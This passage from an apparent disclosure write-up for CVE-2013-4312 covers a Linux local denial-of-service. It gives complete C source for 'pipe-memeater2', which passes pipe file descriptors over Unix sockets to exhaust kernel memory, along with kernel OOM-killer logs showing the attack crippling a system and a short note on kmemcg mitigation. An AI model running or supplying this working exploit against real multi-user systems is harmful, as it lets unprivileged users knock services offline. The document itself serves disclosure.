100.220379] [ 1656] 498 1656 41101 45 2 0 rtkit-daemon [ 100.221717] [ 1661] 0 1661 35453 91 1 0 gdm-session-wor [ 100.223103] [ 1664] 0 1664 25640 254 0 0 sshd [ 100.224290] [ 1666] 500 1666 25640 252 0 0 sshd [ 100.225575] [ 1667] 500 1667 27088 92 3 0 bash [ 100.226844] [ 1686] 500 1686 993 18 0 0 pipe-memeater [ 
100.228117] [ 1687] 500 1687 993 18 3 0 pipe-memeater [ 100.229486] [ 1688] 500 1688 993 18 1 0 pipe-memeater [ 100.230815] [ 1689] 500 1689 993 18 0 0 pipe-memeater [ 100.232127] [ 1690] 500 1690 993 18 2 0 pipe-memeater [ 100.233439] [ 1691] 500 1691 993 18 0 0 pipe-memeater [ 100.234773] [ 1692] 500 1692 993 18 1 0 pipe-memeater [ 100.236084] [ 1693] 500 1693 993 18 0 0 pipe-memeater [ 100.237375] [ 1694] 500 1694 993 18 2 0 pipe-memeater [ 100.238727] [ 1695] 500 1695 993 18 0 0 pipe-memeater [ 100.240035] Out of memory: kill process 1602 (gnome-session) score 230152 or a child [ 100.241502] Killed process 1625 (at-spi-registry) vsz:120748kB, anon-rss:1132kB, file-rss:0kB (Omitting repetitions) [ 117.042248] pipe-memeater invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0 [ 117.047397] pipe-memeater cpuset=/ mems_allowed=0 [ 117.050821] Pid: 1695, comm: pipe-memeater Not tainted 2.6.35.14 #1 [ 117.055079] Call Trace: [ 117.056842] [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0 [ 117.061573] [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0 [ 117.065216] [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120 [ 117.069040] [<ffffffff810f9021>] oom_kill_process+0x81/0x180 [ 117.072962] [<ffffffff810f9558>] __out_of_memory+0x58/0xd0 [ 117.076774] [<ffffffff810f9656>] out_of_memory+0x86/0x1b0 [ 117.080130] [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0 [ 117.081905] [<ffffffff810503f9>] ? finish_task_switch+0x49/0xb0 [ 117.083564] [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100 [ 117.085189] [<ffffffff810f6627>] __page_cache_alloc+0x87/0x90 [ 117.086761] [<ffffffff8110056b>] __do_page_cache_readahead+0xdb/0x210 [ 117.088509] [<ffffffff811006c1>] ra_submit+0x21/0x30 [ 117.089867] [<ffffffff810f7eb0>] filemap_fault+0x400/0x450 [ 117.091370] [<ffffffff81111c34>] __do_fault+0x54/0x550 [ 117.092783] [<ffffffff811148f5>] handle_mm_fault+0x1c5/0xce0 [ 117.094331] [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230 [ 117.095809] [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230 [ 117.097269] [<ffffffff8148817c>] do_page_fault+0x11c/0x320 [ 117.098771] [<ffffffff81484e35>] page_fault+0x25/0x30 [ 117.100186] Mem-Info: [ 117.100828] Node 0 DMA per-cpu: [ 117.101721] CPU 0: hi: 0, btch: 1 usd: 0 [ 117.103026] CPU 1: hi: 0, btch: 1 usd: 0 [ 117.104324] CPU 2: hi: 0, btch: 1 usd: 0 [ 117.105638] CPU 3: hi: 0, btch: 1 usd: 0 [ 117.106938] Node 0 DMA32 per-cpu: [ 117.107901] CPU 0: hi: 186, btch: 31 usd: 0 [ 117.109194] CPU 1: hi: 186, btch: 31 usd: 0 [ 117.110416] CPU 2: hi: 186, btch: 31 usd: 60 [ 117.111349] CPU 3: hi: 186, btch: 31 usd: 0 [ 117.112250] active_anon:108 inactive_anon:943 isolated_anon:0 [ 117.112250] active_file:12 inactive_file:26 isolated_file:0 [ 117.112251] unevictable:0 dirty:0 writeback:0 unstable:0 [ 117.112251] free:3440 slab_reclaimable:3789 slab_unreclaimable:22390 [ 117.112252] mapped:0 shmem:73 pagetables:199 bounce:0 [ 117.117807] Node 0 DMA free:8064kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:24kB slab_unreclaimable:1044kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? 
yes [ 117.124393] lowmem_reserve[]: 0 2004 2004 2004 [ 117.125326] Node 0 DMA32 free:5696kB min:5708kB low:7132kB high:8560kB active_anon:432kB inactive_anon:3772kB active_file:48kB inactive_file:104kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:292kB slab_reclaimable:15132kB slab_unreclaimable:88516kB kernel_stack:1048kB pagetables:796kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:320 all_unreclaimable? yes [ 117.132331] lowmem_reserve[]: 0 0 0 0 [ 117.133309] Node 0 DMA: 0*4kB 76*8kB 0*16kB 1*32kB 2*64kB 1*128kB 2*256kB 1*512kB 2*1024kB 2*2048kB 0*4096kB = 8064kB [ 117.135516] Node 0 DMA32: 699*4kB 1*8kB 6*16kB 2*32kB 2*64kB 1*128kB 0*256kB 1*512kB 0*1024kB 1*2048kB 0*4096kB = 5780kB [ 117.137807] 112 total pagecache pages [ 117.138501] 0 pages in swap cache [ 117.139134] Swap cache stats: add 0, delete 0, find 0/0 [ 117.140090] Free swap = 0kB [ 117.140602] Total swap = 0kB [ 117.143667] 524272 pages RAM [ 117.144630] 13239 pages reserved [ 117.145267] 275 pages shared [ 117.145895] 489349 pages non-shared [ 117.146529] [ pid ] uid tgid total_vm rss cpu oom_adj name [ 117.147662] [ 1] 0 1 4850 75 0 0 init [ 117.148883] [ 423] 0 423 2767 200 0 -17 udevd [ 117.150166] [ 1086] 0 1086 2292 122 1 0 dhclient [ 117.151359] [ 1142] 0 1142 6399 59 0 -17 auditd [ 117.152556] [ 1285] 0 1285 5639 46 1 0 hald-addon-rfki [ 117.153910] [ 1293] 0 1293 5641 47 1 0 hald-addon-inpu [ 117.155214] [ 1317] 0 1317 16570 177 2 -17 sshd [ 117.156409] [ 1426] 0 1426 1028 21 2 0 mingetty [ 117.157610] [ 1428] 0 1428 1028 21 3 0 mingetty [ 117.158821] [ 1430] 0 1430 1032 21 0 0 agetty [ 117.160054] [ 1431] 0 1431 1028 21 1 0 mingetty [ 117.161282] [ 1433] 0 1433 1028 20 1 0 mingetty [ 117.162468] [ 1435] 0 1435 1028 21 2 0 mingetty [ 117.163692] [ 1437] 0 1437 2683 116 3 -17 udevd [ 117.164843] [ 1438] 0 1438 2683 116 2 -17 udevd [ 117.166093] [ 1694] 500 1694 993 19 2 0 pipe-memeater [ 117.167424] [ 1695] 500 1695 993 19 2 0 pipe-memeater [ 117.168767] [ 1697] 0 1697 1028 20 3 0 mingetty [ 117.170007] Out of memory: kill process 1694 (pipe-memeater) score 993 or a child [ 117.171449] Killed process 1694 (pipe-memeater) vsz:3972kB, anon-rss:76kB, file-rss:0kB [kumaneko@localhost ~]$ pstree -pA init(1)-+-agetty(1430) |-auditd(1142)---{auditd}(1143) |-dhclient(1086) |-hald-addon-inpu(1293) |-hald-addon-rfki(1285) |-mingetty(1426) |-mingetty(1428) |-mingetty(1431) |-mingetty(1433) |-mingetty(1435) |-mingetty(1697) |-pipe-memeater(1695) |-sshd(1317)---sshd(1770)---sshd(1772)---bash(1773)---pstree(1790) `-udevd(423)-+-udevd(1437) `-udevd(1438) [kumaneko@localhost ~]$ ---------- Example output end ----------
Therefore, CVE-2013-4312 was assigned to this vulnerability.
"Well, there was a function in TOMOYO 1.7's userspace tools which passes file descriptors using Unix domain socket. Then, if I use Unix domain socket, I feel that I can assign all memory for pipe's buffer by assigning all file descriptors for pipe using only 1 process."
---------- pipe-memeater2.c ----------
#include <stdio.h>
#include <string.h> /* for memmove() */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <fcntl.h>
#include <poll.h>
#define F_SETPIPE_SZ (1024 + 7)

static int send_fd(int socket_fd, int fd)
{
	struct msghdr msg = { };
	struct iovec iov = { "", 1 };
	char cmsg_buf[CMSG_SPACE(sizeof(int))];
	struct cmsghdr *cmsg = (struct cmsghdr *) cmsg_buf;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = cmsg_buf;
	msg.msg_controllen = sizeof(cmsg_buf);
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	msg.msg_controllen = cmsg->cmsg_len;
	memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
	return sendmsg(socket_fd, &msg, MSG_DONTWAIT);
}

int main(int argc, char *argv[])
{
	int fd;
	int socket_fd[2] = { EOF, EOF };
	for (fd = 0; fd < 1024; fd++)
		close(fd);
	for (fd = 0; fd < 10; fd++)
		if (fork() == 0) {
			fd = open("/proc/self/oom_score_adj", O_WRONLY);
			write(fd, "1", 1);
			close(fd);
			while (1)
				sleep(1);
		}
	if (fork() || fork() || setsid() == EOF)
		_exit(0);
	if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd))
		_exit(0);
	fd = socket_fd[1];
	while (1) {
		if (socketpair(PF_UNIX, SOCK_STREAM, 0, socket_fd) ||
		    send_fd(fd, socket_fd[0]) == EOF)
			break;
		while (1) {
			static char buf[4096];
			int ret;
			int pipe_fd[2] = { EOF, EOF };
			if (pipe(pipe_fd))
				break;
			ret = send_fd(fd, pipe_fd[0]);
			if (argc == 1) {
				fcntl(pipe_fd[1], F_SETPIPE_SZ, 1048576);
				fcntl(pipe_fd[1], F_SETFL,
				      O_NONBLOCK | fcntl(pipe_fd[1], F_GETFL));
				while (write(pipe_fd[1], buf, sizeof(buf)) ==
				       sizeof(buf));
			}
			close(pipe_fd[1]);
			close(pipe_fd[0]);
			if (ret == EOF)
				break;
		}
		close(socket_fd[0]);
		close(fd);
		fd = socket_fd[1];
	}
	if (argc != 1)
		while (1)
			sleep(1);
	_exit(0);
}
---------- pipe-memeater2.c ----------
---------- Example output start ---------- [kumaneko@localhost ~]$ pstree -pA init(1)-+-NetworkManager(1271) |-agetty(1502) |-auditd(1207)---{auditd}(1208) |-bonobo-activati(1699)---{bonobo-activat}(1700) |-console-kit-dae(1510)-+-{console-kit-da}(1511) | |-{console-kit-da}(1512) | |-{console-kit-da}(1513) | |-{console-kit-da}(1514) | |-{console-kit-da}(1515) | |-{console-kit-da}(1516) | |-{console-kit-da}(1517) | |-{console-kit-da}(1518) | |-{console-kit-da}(1519) | |-{console-kit-da}(1520) | |-{console-kit-da}(1521) | |-{console-kit-da}(1522) | |-{console-kit-da}(1523) | |-{console-kit-da}(1524) | |-{console-kit-da}(1525) | |-{console-kit-da}(1526) | |-{console-kit-da}(1527) | |-{console-kit-da}(1528) | |-{console-kit-da}(1529) | |-{console-kit-da}(1530) | |-{console-kit-da}(1531) | |-{console-kit-da}(1532) | |-{console-kit-da}(1533) | |-{console-kit-da}(1534) | |-{console-kit-da}(1535) | |-{console-kit-da}(1536) | |-{console-kit-da}(1537) | |-{console-kit-da}(1538) | |-{console-kit-da}(1539) | |-{console-kit-da}(1540) | |-{console-kit-da}(1541) | |-{console-kit-da}(1542) | |-{console-kit-da}(1543) | |-{console-kit-da}(1544) | |-{console-kit-da}(1545) | |-{console-kit-da}(1546) | |-{console-kit-da}(1547) | |-{console-kit-da}(1548) | |-{console-kit-da}(1549) | |-{console-kit-da}(1550) | |-{console-kit-da}(1551) | |-{console-kit-da}(1552) | |-{console-kit-da}(1553) | |-{console-kit-da}(1554) | |-{console-kit-da}(1555) | |-{console-kit-da}(1556) | |-{console-kit-da}(1557) | |-{console-kit-da}(1558) | |-{console-kit-da}(1559) | |-{console-kit-da}(1560) | |-{console-kit-da}(1561) | |-{console-kit-da}(1562) | |-{console-kit-da}(1563) | |-{console-kit-da}(1564) | |-{console-kit-da}(1565) | |-{console-kit-da}(1566) | |-{console-kit-da}(1567) | |-{console-kit-da}(1568) | |-{console-kit-da}(1569) | |-{console-kit-da}(1570) | |-{console-kit-da}(1571) | |-{console-kit-da}(1572) | `-{console-kit-da}(1574) |-crond(1476) |-dbus-daemon(1670) |-dbus-daemon(1258) |-dbus-launch(1669) |-devkit-power-da(1674) |-dhclient(1151) |-gconfd-2(1680) |-gdm-binary(1636)-+-gdm-simple-slav(1649)-+-Xorg(1652) | | |-gdm-session-wor(1730) | | |-gnome-session(1671)-+-at-spi-registry(1694) | | | |-gdm-simple-gree(1710) | | | |-gnome-power-man(1711) | | | |-metacity(1707) | | | |-polkit-gnome-au(1709) | | | `-{gnome-session}(1695) | | `-{gdm-simple-sla}(1653) | `-{gdm-binary}(1650) |-gnome-settings-(1697)---{gnome-settings}(1702) |-gvfsd(1706) |-hald(1310)-+-hald-runner(1311)-+-hald-addon-acpi(1366) | | |-hald-addon-inpu(1359) | | `-hald-addon-rfki(1349) | `-{hald}(1312) |-login(1492)---bash(1577) |-master(1464)-+-pickup(1481) | `-qmgr(1482) |-mingetty(1494) |-mingetty(1496) |-mingetty(1498) |-mingetty(1500) |-mingetty(1503) |-modem-manager(1275) |-notification-da(1716) |-polkitd(1714) |-pulseaudio(1723)---{pulseaudio}(1729) |-rsyslogd(1229)-+-{rsyslogd}(1230) | |-{rsyslogd}(1231) | `-{rsyslogd}(1233) |-rtkit-daemon(1725)-+-{rtkit-daemon}(1726) | `-{rtkit-daemon}(1727) |-sshd(1385)---sshd(1733)---sshd(1735)---bash(1736)---pstree(1753) |-udevd(487)-+-udevd(1507) | `-udevd(1508) `-wpa_supplicant(1350) [kumaneko@localhost ~]$ ./pipe-memeater2 (Omitting re-login operation) [kumaneko@localhost ~]$ dmesg [ 132.693170] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0, oom_score_adj=0 [ 132.695011] pipe-memeater2 cpuset=/ mems_allowed=0 [ 132.695984] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 132.697532] Call Trace: [ 132.698055] [<ffffffff810d7151>] ? 
cpuset_print_task_mems_allowed+0x91/0xb0 [ 132.699429] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 132.700575] [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70 [ 132.701822] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 132.702877] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 132.704026] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 132.705082] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 132.706243] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110 [ 132.707432] [<ffffffff8119d274>] ? pipe_write+0x3c4/0x6b0 [ 132.708457] [<ffffffff81191f0a>] ? do_sync_write+0xfa/0x140 [ 132.709525] [<ffffffff81177f49>] ? ____cache_alloc_node+0x99/0x160 [ 132.710684] [<ffffffff810a1820>] ? autoremove_wake_function+0x0/0x40 [ 132.712004] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160 [ 132.712954] [<ffffffff81232026>] ? security_file_permission+0x16/0x20 [ 132.714140] [<ffffffff81192208>] ? vfs_write+0xb8/0x1a0 [ 132.715225] [<ffffffff811936f6>] ? fget_light_pos+0x16/0x50 [ 132.716293] [<ffffffff81192d41>] ? sys_write+0x51/0xb0 [ 132.717298] [<ffffffff810e8c2e>] ? __audit_syscall_exit+0x25e/0x290 [ 132.718554] [<ffffffff8100b0d2>] ? system_call_fastpath+0x16/0x1b [ 132.719749] Mem-Info: [ 132.720206] Node 0 DMA per-cpu: [ 132.720817] CPU 0: hi: 0, btch: 1 usd: 0 [ 132.721771] CPU 1: hi: 0, btch: 1 usd: 0 [ 132.722666] CPU 2: hi: 0, btch: 1 usd: 0 [ 132.723666] CPU 3: hi: 0, btch: 1 usd: 0 [ 132.724652] Node 0 DMA32 per-cpu: [ 132.725328] CPU 0: hi: 186, btch: 31 usd: 0 [ 132.726211] CPU 1: hi: 186, btch: 31 usd: 36 [ 132.727161] CPU 2: hi: 186, btch: 31 usd: 0 [ 132.728076] CPU 3: hi: 186, btch: 31 usd: 3 [ 132.728950] active_anon:14917 inactive_anon:249 isolated_anon:0 [ 132.728951] active_file:0 inactive_file:18 isolated_file:0 [ 132.728951] unevictable:0 dirty:8 writeback:0 unstable:0 [ 132.728951] free:13255 slab_reclaimable:7730 slab_unreclaimable:20346 [ 132.728952] mapped:281 shmem:306 pagetables:1876 bounce:0 [ 132.734252] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:84kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 132.742139] lowmem_reserve[]: 0 2004 2004 2004 [ 132.743187] Node 0 DMA32 free:44676kB min:44720kB low:55900kB high:67080kB active_anon:59668kB inactive_anon:996kB active_file:0kB inactive_file:72kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:32kB writeback:0kB mapped:1124kB shmem:1224kB slab_reclaimable:30836kB slab_unreclaimable:81132kB kernel_stack:4384kB pagetables:7504kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:191 all_unreclaimable? 
yes [ 132.750447] lowmem_reserve[]: 0 0 0 0 [ 132.751251] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB [ 132.753469] Node 0 DMA32: 1595*4kB 865*8kB 431*16kB 241*32kB 130*64kB 34*128kB 2*256kB 1*512kB 1*1024kB 1*2048kB 0*4096kB = 44676kB [ 132.755994] 356 total pagecache pages [ 132.756679] 0 pages in swap cache [ 132.757295] Swap cache stats: add 0, delete 0, find 0/0 [ 132.758283] Free swap = 0kB [ 132.758803] Total swap = 0kB [ 132.761657] 524272 pages RAM [ 132.762296] 45689 pages reserved [ 132.762876] 1143 pages shared [ 132.763423] 459523 pages non-shared [ 132.764069] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 132.765411] [ 487] 0 487 2699 145 0 -17 -1000 udevd [ 132.766814] [ 1151] 0 1151 2280 123 1 0 0 dhclient [ 132.768201] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd [ 132.769536] [ 1229] 0 1229 62271 648 3 0 0 rsyslogd [ 132.770997] [ 1258] 81 1258 5459 168 2 0 0 dbus-daemon [ 132.772434] [ 1271] 0 1271 20705 222 3 0 0 NetworkManager [ 132.773961] [ 1275] 0 1275 14530 124 3 0 0 modem-manager [ 132.775459] [ 1310] 68 1310 9588 292 3 0 0 hald [ 132.776834] [ 1311] 0 1311 5099 55 3 0 0 hald-runner [ 132.778298] [ 1349] 0 1349 5627 46 1 0 0 hald-addon-rfki [ 132.779789] [ 1350] 0 1350 11247 134 0 0 0 wpa_supplicant [ 132.781244] [ 1359] 0 1359 5629 46 3 0 0 hald-addon-inpu [ 132.782802] [ 1366] 68 1366 4501 41 1 0 0 hald-addon-acpi [ 132.784277] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd [ 132.785665] [ 1464] 0 1464 20222 226 3 0 0 master [ 132.787005] [ 1476] 0 1476 29216 153 0 0 0 crond [ 132.788365] [ 1481] 89 1481 20242 218 2 0 0 pickup [ 132.789833] [ 1482] 89 1482 20259 219 0 0 0 qmgr [ 132.791187] [ 1492] 0 1492 17403 127 1 0 0 login [ 132.792555] [ 1494] 0 1494 1016 21 0 0 0 mingetty [ 132.794302] [ 1496] 0 1496 1016 21 0 0 0 mingetty [ 132.795719] [ 1498] 0 1498 1016 22 0 0 0 mingetty [ 132.797089] [ 1500] 0 1500 1016 22 0 0 0 mingetty [ 132.798541] [ 1502] 0 1502 1020 23 0 0 0 agetty [ 132.799880] [ 1503] 0 1503 1016 20 0 0 0 mingetty [ 132.801484] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd [ 132.802964] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd [ 132.804308] [ 1510] 0 1510 521256 341 3 0 0 console-kit-dae [ 132.805966] [ 1577] 0 1577 27076 95 2 0 0 bash [ 132.807295] [ 1636] 0 1636 33501 81 0 0 0 gdm-binary [ 132.808710] [ 1649] 0 1649 41156 153 3 0 0 gdm-simple-slav [ 132.810269] [ 1652] 0 1652 42840 4384 3 0 0 Xorg [ 132.811594] [ 1669] 42 1669 5009 66 2 0 0 dbus-launch [ 132.813061] [ 1670] 42 1670 5390 86 3 0 0 dbus-daemon [ 132.814495] [ 1671] 42 1671 67289 479 1 0 0 gnome-session [ 132.815956] [ 1674] 0 1674 12490 161 3 0 0 devkit-power-da [ 132.817561] [ 1680] 42 1680 33055 539 3 0 0 gconfd-2 [ 132.819058] [ 1694] 42 1694 30175 292 0 0 0 at-spi-registry [ 132.820530] [ 1697] 42 1697 86838 958 1 0 0 gnome-settings- [ 132.822181] [ 1699] 42 1699 89636 197 1 0 0 bonobo-activati [ 132.823653] [ 1706] 42 1706 33819 82 1 0 0 gvfsd [ 132.825062] [ 1707] 42 1707 71453 682 1 0 0 metacity [ 132.826434] [ 1709] 42 1709 62076 443 0 0 0 polkit-gnome-au [ 132.827924] [ 1710] 42 1710 95132 1239 3 0 0 gdm-simple-gree [ 132.829457] [ 1711] 42 1711 68423 516 3 0 0 gnome-power-man [ 132.830948] [ 1714] 0 1714 13157 303 2 0 0 polkitd [ 132.832303] [ 1723] 42 1723 86434 201 2 0 0 pulseaudio [ 132.833781] [ 1725] 498 1725 42113 53 2 0 0 rtkit-daemon [ 132.835231] [ 1730] 0 1730 35441 95 3 0 0 gdm-session-wor [ 132.836776] [ 1733] 0 1733 25629 255 0 0 0 sshd [ 132.838102] [ 1735] 500 1735 25629 256 0 0 0 sshd [ 
132.839429] [ 1736] 500 1736 27076 94 2 0 0 bash [ 132.840851] [ 1755] 500 1755 981 20 3 0 1 pipe-memeater2 [ 132.842372] [ 1756] 500 1756 981 20 0 0 1 pipe-memeater2 [ 132.843858] [ 1757] 500 1757 981 20 1 0 1 pipe-memeater2 [ 132.845384] [ 1758] 500 1758 981 20 3 0 1 pipe-memeater2 [ 132.846866] [ 1759] 500 1759 981 20 0 0 1 pipe-memeater2 [ 132.848426] [ 1760] 500 1760 981 20 1 0 1 pipe-memeater2 [ 132.850046] [ 1761] 500 1761 981 20 0 0 1 pipe-memeater2 [ 132.851526] [ 1762] 500 1762 981 20 3 0 1 pipe-memeater2 [ 132.853038] [ 1763] 500 1763 981 20 0 0 1 pipe-memeater2 [ 132.854517] [ 1764] 500 1764 981 20 1 0 1 pipe-memeater2 [ 132.856059] [ 1766] 500 1766 981 20 1 0 0 pipe-memeater2 [ 132.857548] Out of memory: Kill process 1697 (gnome-settings-) score 2 or sacrifice child [ 132.859015] Killed process 1697, UID 42, (gnome-settings-) total-vm:347352kB, anon-rss:3252kB, file-rss:580kB (Omitting repetitions) [ 137.704574] pipe-memeater2 invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0, oom_score_adj=0 [ 137.707278] pipe-memeater2 cpuset=/ mems_allowed=0 [ 137.708516] Pid: 1766, comm: pipe-memeater2 Not tainted 2.6.32-573.26.1.el6.x86_64 #1 [ 137.710327] Call Trace: [ 137.711014] [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0 [ 137.712503] [<ffffffff8112a950>] ? dump_header+0x90/0x1b0 [ 137.713895] [<ffffffff8153c797>] ? _spin_unlock_irqrestore+0x17/0x20 [ 137.715475] [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0 [ 137.716797] [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120 [ 137.718171] [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0 [ 137.719466] [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950 [ 137.720710] [<ffffffff8117097a>] ? alloc_pages_current+0xaa/0x110 [ 137.721864] [<ffffffff81127d47>] ? __page_cache_alloc+0x87/0x90 [ 137.723103] [<ffffffff8112772e>] ? find_get_page+0x1e/0xa0 [ 137.724195] [<ffffffff81128ce7>] ? filemap_fault+0x1a7/0x500 [ 137.725370] [<ffffffff811522c4>] ? __do_fault+0x54/0x530 [ 137.726422] [<ffffffff8107ed47>] ? current_fs_time+0x27/0x30 [ 137.727569] [<ffffffff81152897>] ? handle_pte_fault+0xf7/0xb20 [ 137.728774] [<ffffffff8119d1da>] ? pipe_write+0x32a/0x6b0 [ 137.730021] [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0 [ 137.731316] [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500 [ 137.732674] [<ffffffff811b25f2>] ? alloc_fd+0x92/0x160 [ 137.733747] [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0 [ 137.735073] [<ffffffff8153cc55>] ? 
page_fault+0x25/0x30 [ 137.736314] Mem-Info: [ 137.737119] Node 0 DMA per-cpu: [ 137.738204] CPU 0: hi: 0, btch: 1 usd: 0 [ 137.739307] CPU 1: hi: 0, btch: 1 usd: 0 [ 137.740428] CPU 2: hi: 0, btch: 1 usd: 0 [ 137.741553] CPU 3: hi: 0, btch: 1 usd: 0 [ 137.742553] Node 0 DMA32 per-cpu: [ 137.743233] CPU 0: hi: 186, btch: 31 usd: 4 [ 137.745237] CPU 1: hi: 186, btch: 31 usd: 0 [ 137.746208] CPU 2: hi: 186, btch: 31 usd: 0 [ 137.747148] CPU 3: hi: 186, btch: 31 usd: 0 [ 137.748115] active_anon:634 inactive_anon:18 isolated_anon:0 [ 137.748115] active_file:0 inactive_file:96 isolated_file:0 [ 137.748116] unevictable:0 dirty:0 writeback:0 unstable:0 [ 137.748116] free:13318 slab_reclaimable:7641 slab_unreclaimable:20767 [ 137.748117] mapped:21 shmem:75 pagetables:118 bounce:0 [ 137.753688] Node 0 DMA free:8344kB min:332kB low:412kB high:496kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:92kB slab_unreclaimable:252kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 137.760653] lowmem_reserve[]: 0 2004 2004 2004 [ 137.761734] Node 0 DMA32 free:44928kB min:44720kB low:55900kB high:67080kB active_anon:2536kB inactive_anon:72kB active_file:0kB inactive_file:384kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:0kB writeback:0kB mapped:84kB shmem:300kB slab_reclaimable:30472kB slab_unreclaimable:82816kB kernel_stack:2928kB pagetables:472kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 137.769505] lowmem_reserve[]: 0 0 0 0 [ 137.770383] Node 0 DMA: 2*4kB 0*8kB 1*16kB 2*32kB 1*64kB 2*128kB 1*256kB 1*512kB 1*1024kB 3*2048kB 0*4096kB = 8344kB [ 137.772807] Node 0 DMA32: 810*4kB 612*8kB 293*16kB 185*32kB 99*64kB 50*128kB 15*256kB 9*512kB 3*1024kB 1*2048kB 0*4096kB = 45048kB [ 137.775481] 239 total pagecache pages [ 137.776214] 0 pages in swap cache [ 137.776877] Swap cache stats: add 0, delete 0, find 0/0 [ 137.777916] Free swap = 0kB [ 137.778504] Total swap = 0kB [ 137.781695] 524272 pages RAM [ 137.782347] 45689 pages reserved [ 137.783046] 314 pages shared [ 137.783631] 460183 pages non-shared [ 137.784339] [ pid ] uid tgid total_vm rss cpu oom_adj oom_score_adj name [ 137.785819] [ 487] 0 487 2699 145 0 -17 -1000 udevd [ 137.787313] [ 1207] 0 1207 6899 61 3 -17 -1000 auditd [ 137.788720] [ 1385] 0 1385 16558 177 0 -17 -1000 sshd [ 137.790073] [ 1507] 0 1507 2698 144 2 -17 -1000 udevd [ 137.791486] [ 1508] 0 1508 2698 144 0 -17 -1000 udevd [ 137.792912] [ 1766] 500 1766 981 20 3 0 0 pipe-memeater2 [ 137.794509] Out of memory: Kill process 1766 (pipe-memeater2) score 1 or sacrifice child [ 137.796076] Killed process 1766, UID 500, (pipe-memeater2) total-vm:3924kB, anon-rss:80kB, file-rss:0kB [kumaneko@localhost ~]$ pstree -pA init(1)-+-agetty(1777) |-auditd(1207)---{auditd}(1208) |-mingetty(1768) |-mingetty(1769) |-mingetty(1770) |-mingetty(1771) |-mingetty(1772) |-mingetty(1773) |-sshd(1385)---sshd(1856)---sshd(1858)---bash(1859)---pstree(1877) `-udevd(487)-+-udevd(1507) `-udevd(1508) [kumaneko@localhost ~]$ ---------- Example output end ----------
This means that this DoS attack succeeds not only on Linux 2.6.35 and later (which contain the patch in question) but also on Linux 2.0 (released in July 1996, which already supported passing file descriptors over Unix domain sockets).
→ All currently running Linux systems are affected.
On Linux 3.8 and later (which support kmemcg, the kernel memory accounting in the memory cgroup functionality), it is possible to restrict kernel memory usage such as pipe buffers, provided kmemcg is configured appropriately (a configuration sketch follows below).
But there is no mitigation on Linux 3.7 and earlier (which do not support kmemcg), or when kmemcg is not configured.
→ How many of the systems which allow users to execute their own programs actually configure kmemcg?
